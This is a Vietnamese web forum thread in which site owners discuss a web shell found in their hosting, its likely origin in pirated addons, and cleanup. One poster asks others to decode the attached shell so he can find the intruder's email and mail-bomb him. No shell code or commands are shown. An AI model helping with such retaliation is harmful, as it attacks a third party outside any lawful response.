    bác tìm với từ khóa quýet virus cho web, kiếm tra shell trong code ... rồi làm theo, thấy mấy cái cảnh báo màu đỏ hoặc vàng đầy trong code ngay, nhưng mà chả sao hết
     
    THB likes this.
  • xenmax

    xenmax Thượng Đế

    Joined:
    Nov 28, 2017
    Messages:
    45
    Likes Received:
    44
    Trophy Points:
    18
    Gender:
    Male
    Location:
    vn
    cái shell này có thể hacker lợi dụng web bạn để local attack web khác cùng server. Cũng có thể do bạn download addon hoặc style từ các site rác. họ chèn shell vào code share
    Pass svn này là shell của tay sinhviennet dùng, tay này trc chuyên hack code rồi bán. Cũng có thể là người khác dùng con shell này nhưng ko đổi pass
     
    dakhucquan.net, THB and quick87 like this.
  • vanphu113

    vanphu113 Cộng Sự Đắc Lực Staff Member

    Joined:
    Nov 10, 2016
    Messages:
    136
    Likes Received:
    81
    Trophy Points:
    28
    Occupation:
    CEO Founder
    Location:
    HCMC
    Home Page:
    Shell thì có thể được share tren mạng thôi, dựa vào shell không thể xác định được ai là người dùng đâu bạn.
    Ví dụ: shell của hvn cũng được đầy người khác dùng lại nguyên info cũ thôi bạn nhưng không phải do hvn up. Vì thế bạn cần kiểm tra log server hoặc yêu càu bên host kiểm tra nhé. Hosting giờ đa phần là server đều cài cloudlinux nên localattack chắc không có khả năng lắm. Code có bug hoặc dùng code share thôi.
    Đôi điều cùng bạn. @THB
     
    THB likes this.
  • dakhucquan.net

    dakhucquan.net Thượng Đế

    Joined:
    Jun 27, 2015
    Messages:
    312
    Likes Received:
    133
    Trophy Points:
    43
    Gender:
    Male
    Bác nào decode cho e xin với :(, e muốn biết cái mail mà boom chết tổ thằng chèn vào host e :((
    Đính kèm dưới, bác nào mò thì kéo về mo, full ctr panel của shelll
    Code:
    
    
     

    Attached Files:

    Last edited: Dec 20, 2017
    THB likes this.
  • dakhucquan.net

    dakhucquan.net Thượng Đế

    Joined:
    Jun 27, 2015
    Messages:
    312
    Likes Received:
    133
    Trophy Points:
    43
    Gender:
    Male
    thế đấy các bác ạ :))
     
    Last edited: Apr 9, 2020
  • dakhucquan.net

    dakhucquan.net Thượng Đế

    Joined:
    Jun 27, 2015
    Messages:
    312
    Likes Received:
    133
    Trophy Points:
    43
    Gender:
    Male
    xóa sạch code rồi và đang chờ thằng sp nó cài lại host. ko biết nó up tay hay tools mà folder nào củng thấy shell vậy các bác nhể
     
    THB likes this.
  • Share This Page